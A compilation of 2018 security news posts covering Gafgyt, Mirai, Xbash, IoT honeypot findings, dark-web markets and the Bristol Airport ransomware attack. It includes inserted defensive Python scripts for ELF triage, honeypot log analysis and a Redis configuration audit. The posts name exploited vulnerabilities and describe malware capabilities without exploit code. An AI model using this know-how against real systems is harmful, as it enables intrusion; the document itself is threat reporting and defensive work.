Sellers also offer different privilege levels: in some cases they provide “full access permissions” to the compromised sites, while other levels are “abilities to edit content” and “add your content.”

Prices for compromised websites range from $0.50 USD up to $1,000 USD per access, depending on a site ranking that lists various host parameters.

High-value targets command higher prices, for example when the buyer intends to inject payment card sniffers, while lower-ranking sites are usually used for cryptocurrency mining or spam campaigns.

The sellers also offer stolen photocopies of national documents for identity fraud, breached payment wallet access, compromised social media accounts, and Bitcoin mixer or tumbler services.

Pierluigi Paganini

(Security Affairs – MagBo, Darkweb)

The post Access to over 3,000 compromised sites sold on Russian black marketplace MagBo appeared first on Security Affairs.

Dissecting the first Gafgyt bot implementing the “Non Un-Packable” NUP technique

Experts at the CSE Cybsec Z-Lab have found a Gafgyt variant implementing the “Non Un-Packable” technique recently presented at a cyber security conference.

A new variant of the Gafgyt botnet has been spreading in the last few hours, and experts at CSE Cybsec Z-Lab have found it with the support of the Italian cyber security experts @Odisseus and GranetMan.

The new variant analyzed in the report published by the experts was found on a system whose IP address belongs to the Italian ISP Aruba. This specific version implements advanced packing techniques that make static analysis much harder.

We downloaded the samples directly from the compromised server, where we found four builds of the Gafgyt variant, each already compiled for a specific architecture: x86-64, x86-32, MIPS, and ARM.

The sample shows the same behavior associated with the classic Gafgyt botnet, but we immediately noticed a distinctive feature: the implementation of the “Non Un-Packable” (NUP) technique.

Malware Must Die leader @unixfreaxjp presented the sophisticated technique at the recent Radare conference (r2con2018) in his talk about the “Non Un-Packable” packer.

According to the experts, the “Non Un-Packable” ELF had been around for a few months before the talk, and our discovery confirms that malware developers have started adopting it.

The report includes a detailed analysis of the malware.
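The post says only that the variant uses packing that defeats static analysis and that it ships in four architecture-specific ELF builds; it does not describe how the NUP packer works, and the script below does not claim to. As an added example (not code from Z-Lab, MalwareMustDie or the report), here is the first triage step an analyst runs on such samples: decode the ELF file header to confirm class, endianness and architecture, then flag the header inconsistencies that packed or deliberately tampered ELF files commonly show, such as a missing or out-of-bounds section header table. The three sample headers are constructed in the script for demonstration and are not the Gafgyt samples; the check list and function names are assumptions.

```python
import struct

# Constants from the ELF specification.
ELF_MAGIC = b"\x7fELF"
ELFCLASS32, ELFCLASS64 = 1, 2
ELFDATA2LSB, ELFDATA2MSB = 1, 2
SHN_XINDEX = 0xFFFF
# e_machine values for the four architectures named in the Z-Lab report.
MACHINES = {3: "x86-32", 62: "x86-64", 8: "MIPS", 40: "ARM"}
HDR_FIELDS = ["e_type", "e_machine", "e_version", "e_entry", "e_phoff", "e_shoff",
              "e_flags", "e_ehsize", "e_phentsize", "e_phnum", "e_shentsize",
              "e_shnum", "e_shstrndx"]


def parse_elf_header(data):
    """Decode the ELF file header into a dict; raises ValueError for non-ELF input."""
    if len(data) < 52 or data[:4] != ELF_MAGIC:
        raise ValueError("not an ELF file")
    ei_class, ei_data = data[4], data[5]
    if ei_class not in (ELFCLASS32, ELFCLASS64) or ei_data not in (ELFDATA2LSB, ELFDATA2MSB):
        raise ValueError("invalid EI_CLASS or EI_DATA")
    endian = "<" if ei_data == ELFDATA2LSB else ">"
    if ei_class == ELFCLASS64:
        if len(data) < 64:
            raise ValueError("truncated ELF64 header")
        fields = struct.unpack(endian + "HHIQQQIHHHHHH", data[16:64])
    else:
        fields = struct.unpack(endian + "HHIIIIIHHHHHH", data[16:52])
    hdr = dict(zip(HDR_FIELDS, fields))
    hdr["class"] = 64 if ei_class == ELFCLASS64 else 32
    hdr["arch"] = MACHINES.get(hdr["e_machine"], "unknown(%d)" % hdr["e_machine"])
    return hdr


def triage(data):
    """Return (header, warnings); each warning is a header inconsistency that
    commonly results from packing or deliberate anti-analysis tampering."""
    hdr = parse_elf_header(data)
    size = len(data)
    warnings = []
    if hdr["e_shoff"] == 0 or hdr["e_shnum"] == 0:
        warnings.append("no section header table: section names and symbols are unavailable to static tools")
    else:
        if hdr["e_shoff"] + hdr["e_shentsize"] * hdr["e_shnum"] > size:
            warnings.append("section header table points past end of file")
        if hdr["e_shstrndx"] != SHN_XINDEX and hdr["e_shstrndx"] >= hdr["e_shnum"]:
            warnings.append("section name string table index out of range")
    if hdr["e_phnum"] == 0:
        warnings.append("no program headers: the loader cannot map this file normally")
    elif hdr["e_phoff"] + hdr["e_phentsize"] * hdr["e_phnum"] > size:
        warnings.append("program header table points past end of file")
    return hdr, warnings


# --- Constructed sample headers for demonstration (not the Z-Lab samples) ---

def _elf64_le(machine, shoff, shnum, shstrndx, total=400):
    ident = ELF_MAGIC + bytes([ELFCLASS64, ELFDATA2LSB, 1]) + bytes(9)
    body = struct.pack("<HHIQQQIHHHHHH", 2, machine, 1, 0x400000, 64, shoff,
                       0, 64, 56, 1, 64, shnum, shstrndx)
    return (ident + body).ljust(total, b"\0")


def _elf32_be(machine, shoff, shnum, shstrndx, total=128):
    ident = ELF_MAGIC + bytes([ELFCLASS32, ELFDATA2MSB, 1]) + bytes(9)
    body = struct.pack(">HHIIIIIHHHHHH", 2, machine, 1, 0x400000, 52, shoff,
                       0, 52, 32, 1, 40, shnum, shstrndx)
    return (ident + body).ljust(total, b"\0")


SAMPLE_CLEAN_X86_64 = _elf64_le(62, shoff=120, shnum=3, shstrndx=2)          # tables fit in file
SAMPLE_ARM_NO_SECTIONS = _elf64_le(40, shoff=0, shnum=0, shstrndx=0)         # section table stripped
SAMPLE_MIPS_BOGUS_SHOFF = _elf32_be(8, shoff=0x7FFF0000, shnum=3, shstrndx=2)  # points past EOF


if __name__ == "__main__":
    for name, blob in [("clean", SAMPLE_CLEAN_X86_64), ("arm", SAMPLE_ARM_NO_SECTIONS),
                       ("mips", SAMPLE_MIPS_BOGUS_SHOFF)]:
        hdr, warns = triage(blob)
        print(name, hdr["arch"], hdr["class"], warns or "ok")
```

The point of running this before any disassembler is that a stripped or bogus section table does not stop the kernel from loading the file (the loader only needs the program headers), but it does stop most static tools from naming sections and symbols. A warning therefore tells the analyst to fall back on program-header and dynamic analysis rather than trust what a section-based tool reports.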

You can download the full ZLAB Malware Analysis Report at the following URL:

http://csecybsec.com/download/zlab/20180919_CSE_Gafgyt_v2.pdf

Pierluigi Paganini

(Security Affairs – Gafgyt, malware)

The post Dissecting the first Gafgyt bot implementing the “Non Un-Packable” NUP technique appeared first on Security Affairs.


California man may get 6 months in prison for uploading Deadpool on Facebook

By Carolina

It is quite unlikely that somebody would be naïve enough to upload a copy of a newly released movie on his Facebook page with his real name since this would lead the law enforcement straight to the person, that too, in no time. However, it seems that there is one such person and his name […]

This is a post from HackRead.com Read the original post: California man may get 6 months in prison for uploading Deadpool on Facebook

Mirai Botnet Creators Helping FBI Fight Cybercrime to Stay Out of Jail

Three young hackers who were sentenced late last year for creating and spreading the notorious Mirai botnet are now helping the FBI to investigate other "complex" cybercrime cases in return for avoiding lengthy prison terms. Paras Jha, 21 from New Jersey, Josiah White, 20 from Washington, and Dalton Norman, 21 from Louisiana, pleaded guilty in December 2017 to multiple charges for their role

Security Affairs: Mirai authors avoid the jail by helping US authorities in other investigations

Three men who admitted to being the authors of the Mirai botnet avoided jail after helping the FBI in other cybercrime investigations.

I have been following the evolution of the Mirai botnet since MalwareMustDie shared the findings of its investigation with me in August 2016.

Now the three individuals who admitted to being the authors of the infamous botnet have avoided jail after helping the feds in other cybercrime investigations.

The three men, Josiah White (21) of Washington, Pennsylvania; Paras Jha (22), of Fanwood, New Jersey, and Dalton Norman (22), of Metairie, Louisiana, pleaded guilty in December 2017 to developing and running the dreaded Mirai botnet that was involved in several massive DDoS attacks.

The identification and conviction of the three men is the result of an international joint cooperation between government agencies in the US, UK, Northern Ireland, and France, and private firms, including Palo Alto Networks, Google, Cloudflare, Coinbase, Flashpoint, Oath, Qihoo 360 and Akamai.

According to the plea agreements, White developed the Telnet scanner component used by Mirai, Jha created the botnet’s core infrastructure and the malware’s remote control features, while Norman developed new exploits.

Jha, who goes online by the moniker “Anna-senpai”, leaked the source code for the Mirai malware on a criminal forum, allowing other threat actors to use it and making attribution of the attacks harder.

Jha also pleaded guilty to carrying out multiple DDoS attacks against his alma mater Rutgers University between November 2014 and September 2016, before creating the Mirai botnet. According to the authorities, the three earned roughly $180,000 through their click fraud scheme.

The Mirai case was investigated by the FBI Field Office in Anchorage, and the Chief U.S. District Judge in Alaska sentenced the men.

“U.S. Attorney Bryan Schroder announced today that three defendants have been sentenced for their roles in creating and operating two botnets, which targeted “Internet of Things” (IoT) devices.  Paras Jha, 22, of Fanwood, New Jersey; Josiah White, 21, of Washington, Pennsylvania; and Dalton Norman, 22, of Metairie, Louisiana, were sentenced today by Chief U.S. District Judge Timothy M. Burgess.” states the press release published by the DoJ.

“On Dec. 8, 2017, Jha, White, and Norman pleaded guilty to criminal Informations in the District of Alaska charging them each with conspiracy to violate the Computer Fraud & Abuse Act in operating the Mirai Botnet.  Jha and Norman also pleaded guilty to two counts each of the same charge, one in relation to the Mirai botnet and the other in relation to the Clickfraud botnet.”

On Tuesday, the DoJ revealed that each of the men was sentenced to five years of probation and 2,500 hours of community service.

The court ordered them to pay $127,000 in restitution, and they voluntarily handed over large amounts of cryptocurrency that the authorities had seized during the investigation of the botnet.

The three men “cooperated extensively” with the authorities, helping the FBI on complex cybercrime investigations before sentencing. The trio will continue to support the feds.

“After cooperating extensively with the FBI, Jha, White, and Norman were each sentenced to serve a five-year period of probation, 2,500 hours of community service, ordered to pay restitution in the amount of $127,000, and have voluntarily abandoned significant amounts of cryptocurrency seized during the course of the investigation.” continues the press release.

“As part of their sentences, Jha, White, and Norman must continue to cooperate with the FBI on cybercrime and cybersecurity matters, as well as continued cooperation with and assistance to law enforcement and the broader research community.”

Pierluigi Paganini

(Security Affairs – Mirai, botnet)

The post Mirai authors avoid the jail by helping US authorities in other investigations appeared first on Security Affairs.

Keeping Your Personal Information Safe

By Vasilii Chekalov, EveryCloud. According to a study by Statista in March of 2018, 63% of respondents expressed concern that they would be hacked in the next five years. 60%

The post Keeping Your Personal Information Safe appeared first on The Cyber Security Place.

Evolution of threat landscape for IoT devices – H1 2018

Security experts from Kaspersky have published an interesting report on the new trends in the IoT threat landscape. What is infecting IoT devices and how?

The researchers set up a honeypot to collect data on infected IoT devices, the way threat actors infect IoT devices and what families of malware are involved.

The first finding that emerged from the study is that threat actors continue to look at IoT devices with increasing interest. In the first six months of 2018, the experts observed three times as many malware samples targeting IoT devices as in the whole of 2017, and 2017 in turn saw ten times more than 2016.

In the first half of 2018, researchers at Kaspersky Lab found that the most popular attack vector against IoT devices remains cracking Telnet passwords (75.40%), followed by cracking SSH passwords (11.59%).

Mirai dominates the IoT threat landscape: 20.9% of IoT devices were infected by this malicious code, while other prominent malware families are Hajime (5.89%) and Gafgyt.

The top 10 countries from which Kaspersky’s traps were hit by Telnet password attacks are led by Brazil, China, and Japan.

“As we see, in Q2 2018 the leader by number of unique IP addresses from which Telnet password attacks originated was Brazil (23%). Second place went to China (17%). Russia in our list took 4th place (7%).” reads the report.

“Overall for the period January 1 – July 2018, our Telnet honeypot registered more than 12 million attacks from 86,560 unique IP addresses, and malware was downloaded from 27,693 unique IP addresses.”

Experts pointed out that infected MikroTik routers made up 37.23 percent of all the data collected, followed by TP-Link devices, which accounted for 9.07%.
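The figures above (attempts, unique source IPs, share per country, top attack vector) are exactly what a Telnet honeypot operator derives from raw login records. As an added example, not Kaspersky's code or data, the Python script below parses a few constructed honeypot log lines in an assumed format, aggregates them the same way the report does, and flags sources that hammer the credential prompt, which is the signal a defender would feed into a blocklist. The log format, the IP-to-country table standing in for a GeoIP database, and the function names are all assumptions.

```python
import re
from collections import Counter

# Constructed Telnet honeypot log lines (not Kaspersky's data). Assumed format:
#   <ISO time> <source ip> telnet login user=<u> pass=<p> result=<ok|fail>
SAMPLE_LOG = """\
2018-06-01T10:00:01Z 203.0.113.5 telnet login user=root pass=admin result=fail
2018-06-01T10:00:02Z 203.0.113.5 telnet login user=root pass=12345 result=fail
2018-06-01T10:00:03Z 203.0.113.5 telnet login user=admin pass=admin result=ok
2018-06-01T10:01:10Z 198.51.100.7 telnet login user=root pass=root result=fail
2018-06-01T10:01:11Z 198.51.100.7 telnet login user=root pass=admin result=ok
2018-06-01T10:02:00Z 192.0.2.9 telnet login user=support pass=support result=fail
2018-06-01T10:02:30Z 192.0.2.10 telnet login user=admin pass=admin result=fail
2018-06-01T10:03:00Z 203.0.113.77 telnet login user=root pass=root result=fail
malformed line that the parser must skip
"""

# Constructed source-IP to country table standing in for a GeoIP database.
GEO = {"203.0.113.5": "BR", "203.0.113.77": "BR", "198.51.100.7": "CN",
       "192.0.2.9": "JP", "192.0.2.10": "RU"}

LINE_RE = re.compile(r"^(\S+) (\S+) telnet login user=(\S*) pass=(\S*) result=(ok|fail)$")


def parse_log(text):
    """Turn honeypot lines into event dicts, silently skipping malformed lines."""
    events = []
    for line in text.splitlines():
        m = LINE_RE.match(line)
        if m:
            ts, ip, user, pw, result = m.groups()
            events.append({"ts": ts, "ip": ip, "user": user, "pass": pw, "ok": result == "ok"})
    return events


def summarize(events, geo=GEO):
    """Aggregate the way the Kaspersky report does: attempts, unique source IPs,
    share of unique IPs per country, most-tried credentials, successful logins."""
    ips = {e["ip"] for e in events}
    by_country = Counter(geo.get(ip, "??") for ip in ips)
    country_share = {c: round(100.0 * n / len(ips), 1) for c, n in by_country.items()}
    creds = Counter((e["user"], e["pass"]) for e in events)
    successes = [(e["ip"], e["user"], e["pass"]) for e in events if e["ok"]]
    return {
        "attempts": len(events),
        "unique_ips": len(ips),
        "country_share": country_share,
        "top_credentials": creds.most_common(3),
        "successful_logins": successes,
    }


def brute_force_sources(events, threshold=3):
    """Source IPs with at least `threshold` login attempts: candidates for blocking."""
    per_ip = Counter(e["ip"] for e in events)
    return sorted(ip for ip, n in per_ip.items() if n >= threshold)


if __name__ == "__main__":
    evs = parse_log(SAMPLE_LOG)
    print(summarize(evs))
    print("brute-force sources:", brute_force_sources(evs))
```

Two details matter when this runs on real honeypot output rather than the constructed lines: country shares are computed over unique source IPs, as in the quoted report, not over attempts, so one noisy bot does not skew a country's figure; and the `successful_logins` list is the one worth alerting on, because every entry is a credential pair that a real device on the same network would have accepted too.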

MikroTik devices running under RouterOS are targeted by malicious code that includes the exploit for the Chimay-Red vulnerability.

The Chimay Red hacking tool leverages two exploits: the Winbox Any Directory File Read (CVE-2018-14847) and the Webfig Remote Code Execution vulnerability.

MikroTik devices were involved in several campaigns in the past months, including the VPNFilter botnet that infected almost a million routers in more than 50 countries.

Experts highlighted that IoT malware is increasing both in quantity and quality.

“More and more exploits are being weaponized by cybercriminals, and infected devices are used to steal personal data and mine cryptocurrencies, on top of traditional DDoS attacks.” concludes Kaspersky.

Let me suggest reading the report; it is full of interesting data.

Pierluigi Paganini

(Security Affairs – IoT devices, hacking)

The post Evolution of threat landscape for IoT devices – H1 2018 appeared first on Security Affairs.

Security Affairs: Evolution of threat landscape for IoT devices – H1 2018

Security experts from Kaspersky have published an interesting report on the new trends in the IoT threat landscape. What is infecting IoT devices and how?

The researchers set up a honeypot to collect data on infected IoT devices, the way threat actors infect IoT devices and what families of malware are involved.

The first data that emerged from the study is that threat actors continue to look at the IoT devices with increasing interest. In the first six months of 2018, the experts observed a number of malware samples that was up three times as many samples targeting IoT devices as in the whole of 2017. In 2017 there were ten times more than in 2016.

IoT devices attacks

In the first half of 2018, researchers at Kaspersky Lab said that the most popular attack vector against IoT devices remains cracking Telnet passwords (75,40%), followed by cracking SSH passwords (11,59%).

Mirai dominates the IoT threat landscape, 20.9% of IoT devices were infected by this malicious code, other prominent malware are Hajime (5.89%) and Gafgyt.

Top 10 countries from which Kaspersky traps were hit by Telnet password attacks is led by Brazil, China, and Japan.

“As we see, in Q2 2018 the leader by number of unique IP addresses from which Telnet password attacks originated was Brazil (23%). Second place went to China (17%). Russia in our list took 4th place (7%).” reads the report.

“Overall for the period January 1 – July 2018, our Telnet honeypot registered more than 12 million attacks from 86,560 unique IP addresses, and malware was downloaded from 27,693 unique IP addresses.”

Experts pointed out that infected MikroTik routers made up 37.23 percent of all the data collected, followed by TP-Link that accounted for 9.07%.

MikroTik devices running under RouterOS are targeted by malicious code that includes the exploit for the Chimay-Red vulnerability.

The Chimay Red hacking tool leverages 2 exploits, the Winbox Any Directory File Read (CVE-2018-14847) and Webfig Remote Code Execution Vulnerability.

MikroTik devices were involved in several campaigns in the past months, including the VPNfilter botnet that infected almost a million routers in more than 50 countries


Experts highlighted that IoT malware is increasing both in quantity and quality.

“More and more exploits are being weaponized by cybercriminals, and infected devices are used to steal personal data and mine cryptocurrencies, on top of traditional DDoS attacks.” concludes Kaspersky.

Let me suggest reading the report; it is full of interesting data.

Pierluigi Paganini

(Security Affairs – IoT devices, hacking)

The post Evolution of threat landscape for IoT devices – H1 2018 appeared first on Security Affairs.




Dark Web: US court seizes assets and properties of deceased AlphaBay operator

By Waqas

AlphaBay was one of the largest dark web marketplaces – In 2017, its admin Alexandre Cazes committed suicide in a Thai prison. The Fresno Division of the U.S. District Court for the Eastern District of California has finally concluded a 14-month long civil forfeiture case and allowed seizure of property and assets of a Canadian national Alexandre Cazes […]

This is a post from HackRead.com. Read the original post: Dark Web: US court seizes assets and properties of deceased AlphaBay operator

Hackers disrupt UK’s Bristol Airport flight info screens after ransomware attack

By Uzair Amir

The ransomware attack disrupted the screens for two days. In a nasty ransomware attack, flight information screens at the United Kingdom's Bristol Airport were taken over and hijacked by malicious hackers on Friday morning, September 15th. The ransomware attack forced the airport staff to go manual by using whiteboards and hand-written information to assist passengers regarding their […]

This is a post from HackRead.com. Read the original post: Hackers disrupt UK's Bristol Airport flight info screens after ransomware attack

Hackers as Heroes: How Ethical Hacking is Changing the Industry

Hackers all around the world have long been portrayed in media and pop culture as the bad guys. Society is taught to see them as cyber-criminals and outliers who seek

The post Hackers as Heroes: How Ethical Hacking is Changing the Industry appeared first on The Cyber Security Place.

Security Affairs: New XBash malware combines features from ransomware, cryptocurrency miners, botnets, and worms

Palo Alto Networks researchers discovered a new malware, tracked as XBash, that combines features from ransomware, cryptocurrency miners, botnets, and worms.

Security researchers at Palo Alto Networks have discovered a new piece of malware, dubbed Xbash, that targets both Linux and Microsoft Windows servers.

Xbash was written in Python; the authors then packaged it into self-contained Linux ELF executables by abusing the legitimate tool PyInstaller for distribution.

The malicious code combines features from different families of malware such as ransomware, cryptocurrency miners, botnets, and worms.

“Xbash has ransomware and coinmining capabilities. It also has self-propagating capabilities (meaning it has worm-like characteristics similar to WannaCry or Petya/NotPetya).” reads the analysis published by Palo Alto Networks.

“It also has capabilities not currently implemented that, when implemented, could enable it to spread very quickly within an organizations’ network (again, much like WannaCry or Petya/NotPetya).”

The malicious code was attributed to a popular crime gang tracked as the Iron Group.

The Iron cybercrime group has been active since at least 2016. It is known for the Iron ransomware, but over the years it has built various strains of malware, including backdoors, cryptocurrency miners, and ransomware targeting both mobile and desktop systems.

“In April 2018, while monitoring public data feeds, we noticed an interesting and previously unknown backdoor using HackingTeam’s leaked RCS source code.” states the report published by Intezer.

“We discovered that this backdoor was developed by the Iron cybercrime group, the same group behind the Iron ransomware (rip-off Maktub ransomware recently discovered by Bart Parys), which we believe has been active for the past 18 months.”

Thousands of victims have been infected by malware used by the crime gang.

Now the experts from Palo Alto Networks have discovered the new Xbash strain, which combines botnet, coinmining, ransomware, and self-propagation capabilities. The botnet and ransomware features were observed in infections of Linux systems, while the coinminer behavior was seen in infections of Windows servers.

The Xbash authors implemented scanning capabilities that the malware uses to search for vulnerable servers online. The malicious code looks for unpatched web applications that are vulnerable to a series of known exploits, or that can be brute-forced with a dictionary of default credentials.

“When Xbash finds a destination has Hadoop, Redis or ActiveMQ running, it will also attempt to exploit the service for self-propagation.” continues the report.

“Three known vulnerabilities are targeted:

  1. Hadoop YARN ResourceManager unauthenticated command execution, which was first disclosed in October 2016 and has no CVE number assigned.
  2. Redis arbitrary file write and remote command execution, which was first disclosed in October 2015 and has no CVE number assigned. This is shown below in Figure 6.
  3. ActiveMQ arbitrary file write vulnerability, CVE-2016-3088.”

 

The malware infects Windows systems only after compromising a vulnerable Redis server.

The scanner component also scans the Internet for servers running services that have been left exposed online without a password or with weak credentials. The scanner targets web servers (HTTP), VNC, MariaDB, MySQL, PostgreSQL, Redis, MongoDB, Oracle DB, CouchDB, ElasticSearch, Memcached, FTP, Telnet, RDP, UPnP/SSDP, NTP, DNS, SNMP, LDAP, Rexec, Rlogin, Rsh, and Rsync.
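Since Xbash reaches Windows hosts only through an exposed Redis server, and its scanner simply looks for services left online without a password, the defensive check is a configuration review. The following Python audit is an added example, not code from the Palo Alto Networks report: it reads a redis.conf and flags the settings that leave an instance reachable without authentication. The two config fragments are constructed; the directive names (bind, protected-mode, requirepass, rename-command, user) are standard Redis settings.

```python
"""Audit a redis.conf for the kind of exposure an Internet-wide scanner finds."""
from typing import Dict, List

LOOPBACK = {"127.0.0.1", "::1", "localhost"}

# Constructed: an instance listening on every interface with no password.
EXPOSED_CONF = """
# edited for remote access
bind 0.0.0.0
protected-mode no
port 6379
"""

# Constructed: the same instance with the weak settings corrected.
HARDENED_CONF = """
bind 127.0.0.1
protected-mode yes
port 6379
requirepass REPLACE_WITH_A_LONG_RANDOM_SECRET
rename-command CONFIG ""
"""


def parse_redis_conf(text: str) -> Dict[str, List[str]]:
    """Map each directive to the list of values seen (Redis applies the last one)."""
    directives: Dict[str, List[str]] = {}
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith("#"):
            continue
        name, _, value = line.partition(" ")
        directives.setdefault(name.lower(), []).append(value.strip())
    return directives


def audit_redis_conf(text: str) -> List[str]:
    """Return a list of findings; an empty list means no exposure was found."""
    d = parse_redis_conf(text)
    findings: List[str] = []

    bind_addrs = d["bind"][-1].split() if "bind" in d else []
    # Redis 6+ accepts a leading '-' meaning "do not fail if this address is missing".
    remote_addrs = [a for a in bind_addrs if a.lstrip("-") not in LOOPBACK]
    protected = d.get("protected-mode", ["yes"])[-1].lower() == "yes"
    password = d.get("requirepass", [""])[-1].strip("\"'")
    has_auth = bool(password) or "user" in d  # ACL users (Redis 6+) also count

    # No bind line means all interfaces. protected-mode then refuses remote
    # clients only while no password is set: a safety net, not authentication.
    if not bind_addrs and not protected and not has_auth:
        findings.append("listens on all interfaces with protected-mode off and no authentication")

    # An explicit non-loopback bind switches protected-mode off for those
    # addresses, so a password or ACL is all that is left in front of the
    # command interface.
    if remote_addrs and not has_auth:
        findings.append(f"bound to {', '.join(remote_addrs)} without requirepass or ACL users")

    # CONFIG lets any connected client reconfigure the server at runtime; the
    # Redis security guide recommends renaming or disabling it when exposed.
    config_cmd_renamed = any(v.split()[0].upper() == "CONFIG"
                             for v in d.get("rename-command", []) if v.split())
    if (remote_addrs or not bind_addrs) and not config_cmd_renamed:
        findings.append("CONFIG command reachable by every client; rename or disable it on a network-exposed instance")
    return findings


if __name__ == "__main__":
    for label, conf in (("exposed", EXPOSED_CONF), ("hardened", HARDENED_CONF)):
        print(label, "->", audit_redis_conf(conf) or "no findings")
```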

The attackers monetize their efforts through coin-mining on Windows systems or with ransomware-based attacks on Linux servers running database services.

The Xbash ransomware component deletes MySQL, MongoDB, and PostgreSQL databases and drops a ransom note asking for a payment of 0.02 Bitcoin ($125) to recover them.


Unfortunately, victims will never recover their data, because the malware wipes it without backing it up anywhere.

“we have observed three different bitcoin wallet addresses hard-coded in the Xbash samples. Since May 2018, there are 48 incoming transactions to these wallets with total income of about 0.964 bitcoins (about US$6,000 at the time of this writing).” continues the analysis.

“the funds are being withdrawn, showing us that the attackers are actively collecting their ransom.”

Experts noticed in all versions of Xbash the presence of a Python class named “LanScan” intended to target enterprise networks. The class can gather local intranet information, generate a list of all IP addresses within the same subnet, and port-scan all of those IPs.

This code is not yet active in the malware; the crooks are likely still developing it.

Experts believe Xbash will continue to evolve, for example by adding the miner component to Linux servers as well.

Further details, including IoCs, are reported in the analysis published by the experts.

Pierluigi Paganini

(Security Affairs – malware, cybercrime)

The post New XBash malware combines features from ransomware, cryptocurrency miners, botnets, and worms appeared first on Security Affairs.




Security Affairs: Greek authorities approved extradition of Russian hacker Alexander Vinnik to Russia

Greek authorities have approved the extradition of Russian national Alexander Vinnik to Russia: the Supreme Civil and Criminal Court of Greece has overruled previous rulings.

The Greek authorities have approved the extradition of Russian national Alexander Vinnik to Russia. The decision surprised the media, because the man was expected to be extradited to the US or France, as previously announced.

The decision of the Supreme Civil and Criminal Court of Greece has overruled previous ones that were taken by other Greek courts.

Vinnik is wanted by Russia, France, and the United States, where he is charged with different crimes.

Greek police arrested the Russian national Alexander Vinnik (38) and accused him of running the BTC-e Bitcoin exchange to launder more than US$4bn worth of the cryptocurrency.

The police seized two laptops, two tablets, mobile phones, a router, a camera, and four credit cards.

The authorities reported that since 2011, 7 million Bitcoin went into the BTC-e exchange and 5.5 million were withdrawn.

According to the Greek media outlet the Daily Thess, the FBI tracked Alexander Vinnik for more than a year.

The man is charged by the US authorities with fraud and money laundering involving more than $4 billion worth of Bitcoin (BTC) resulting from criminal activities; US prosecutors requested his extradition in July 2017.

The Greek Supreme Court first opted to extradite Vinnik to the US to face charges of operating an unlicensed money service business, money laundering, conspiracy to commit money laundering, and engaging in unlawful monetary transactions.

Vinnik is also accused of being responsible for the failure of the Japanese Bitcoin exchange Mt. Gox. Mt. Gox was the biggest Bitcoin exchange at the time of its shutdown in 2014, which came after the platform fell victim to a series of cyber heists totalling $375 million in Bitcoin.

The U.S. authorities speculate that the Russian man stole funds from Mt. Gox with the help of an insider. The stolen funds were transferred to a wallet managed by Vinnik and laundered through his BTC-e service over a three-year period.

In July 2018 there was a twist: a Greek lower court agreed to extradite Vinnik to France to face charges of hacking, money laundering, extortion, and involvement in organized crime.

The Russian Foreign Ministry criticized the ruling and said the country would consider a response.

“Several days after taking an unfriendly decision to expel Russian diplomats and to deny entry to several Russian citizens, they have adopted a decision to extradite Russian citizen Alexander Vinnik to France,” Russia’s Foreign Ministry wrote in a statement. “It is obvious that Russia cannot leave these actions unanswered.”


The Russian government officially asked the Greek government to extradite Vinnik to Russia, where he faces around $10,000 worth of fraud charges, practically nothing compared to the charges in the US and France.

Now the decision of the Greek Supreme Court is disconcerting: Vinnik is going to be extradited to Russia.

The Supreme Court will examine France's request for extradition on September 19, but its decision could be overruled by the Greek Minister of Justice.

Pierluigi Paganini

(Security Affairs – Vinnik, BTC-e Bitcoin exchange)

The post Greek authorities approved extradition of Russian hacker Alexander Vinnik to Russia appeared first on Security Affairs.




EOSBet Gambling application hacked, crooks stole $200,000 worth of EOS

The gambling application EOSBet was affected by a vulnerability in its smart contract system that attackers exploited to steal $200,000 worth of EOS.

The security breach was first reported by “thbourlove”, a member of the EOSBet Reddit community, who shared the code used to exploit the flaw.

After seeing the exploit code, the EOSBet’s official Reddit account admitted the hack.

“Yep, we were hacked. But we also have this exact assertion that you do. I would be careful, it’s a bit deeper than you think.” stated the EOSBet’s official Reddit account.


“A million-dollar EOS gambling dApp suffered a major blow, just days after declaring itself to be the safest of its kind.” reported The Next Web website.

“Hackers have taken 40,000 EOS ($200,000) from the operating wallet of EOSBet by exploiting vulnerabilities in its smart contracts”

The gambling application is based on the EOS blockchain; it was taken offline in response to the security breach.

“[…] A few hours ago, we were attacked, and about 40,000 EOS was taken from our bankroll,” said an EOSBet spokesperson.

“This bug was not minor as was stated previously, and we are still doing forensics and piecing together what happened.”

According to the company, the attackers exploited a bug in one of its games, but it seems that the same issue could affect other games on the gambling platform.

The hackers were able to forge a fake hash to hijack EOSBet's fund transfers.

The attackers attempted to transfer funds to a wallet under their control whose name looks very similar to the one used by EOSBet.

The hackers made only a limited number of transactions from several accounts, using the following message (or a similar one) as the memo:

“Memo: Please refund the illegal income eos, otherwise we will hire a team of lawyers in China to pursue all criminal liability and losses to you. Eosbet official eos account: eosbetdicell.”

The crooks then distributed the gains by splitting them across many wallets, each receiving small amounts of EOS tokens with the following message:

“Memo: Dear players: In order to make up for the loss of eosbet players in the hacking incident, the platform launched a recharge to send BET. 1EOS=1BET, the official eos account: eosbetdicell, the transfer will automatically give the same BET.”

It is still unclear whether this incident is connected to a suspicious win last week, when a player claimed over $600,000 from EOSBet by repeatedly doubling their money in 36 hours.

Platform managers ruled out any link between the hack and what they consider a legitimate win.

Pierluigi Paganini

(Security Affairs – EOSBet, security breach)

The post EOSBet Gambling application hacked, crooks stole $200,000 worth of EOS appeared first on Security Affairs.


Security Affairs: Cyber attack took offline flight display screens at the Bristol Airport

Bristol Airport was hit by a cyber attack that caused problems with operations: flight display screens were taken offline for two days.

Bristol Airport was hit by a ransomware-based attack that knocked the flight display screens offline for two entire days.

The news was reported by the BBC and confirmed by an airport spokesman, who explained that the information screens were taken offline early on Friday in response to a “ransomware” based attack.

“Bristol Airport has blamed a cyber attack for causing flight display screens to fail for two days.” states the article published by the BBC.

“They are now working again at “key locations” including in departures and arrivals, and work is continuing to get the whole site back online.”

The staff started incident response and contingency measures; “manual processes” made up for the interruption of the systems, with the spokesman referring to the use of whiteboards and marker pens.

According to the spokesman, the airport did not pay the ransom to the attackers.

“We believe there was an online attempt to target part of our administrative systems and that required us to take a number of applications offline as a precautionary measure, including the one that provides our data for flight information screens.” said airport spokesman James Gore.

“That was done to contain the problem and avoid any further impact on more critical systems.”


Source: BBC. Image copyright JULIEANNE MCMAHON. Image caption: A spokesman said whiteboards and marker pens had to be used in place of display screens.

The experts don’t believe it was a targeted attack against British critical infrastructure.

“The indications are that this was a speculative attempt rather than targeted attack on Bristol Airport.”

The good news is that flights were not affected by the cyber attack.

Mr Gore said flights were unaffected, but contingency measures and “manual processes”, including whiteboards and marker pens, had to be used in place of display screens.

“At no point were any safety or security systems impacted or put at risk.”

“Given the number of safety and security critical systems operating at an airport, we wanted to make sure that the issue with the flight information application that experienced the problem was absolutely resolved before it was put back online.”

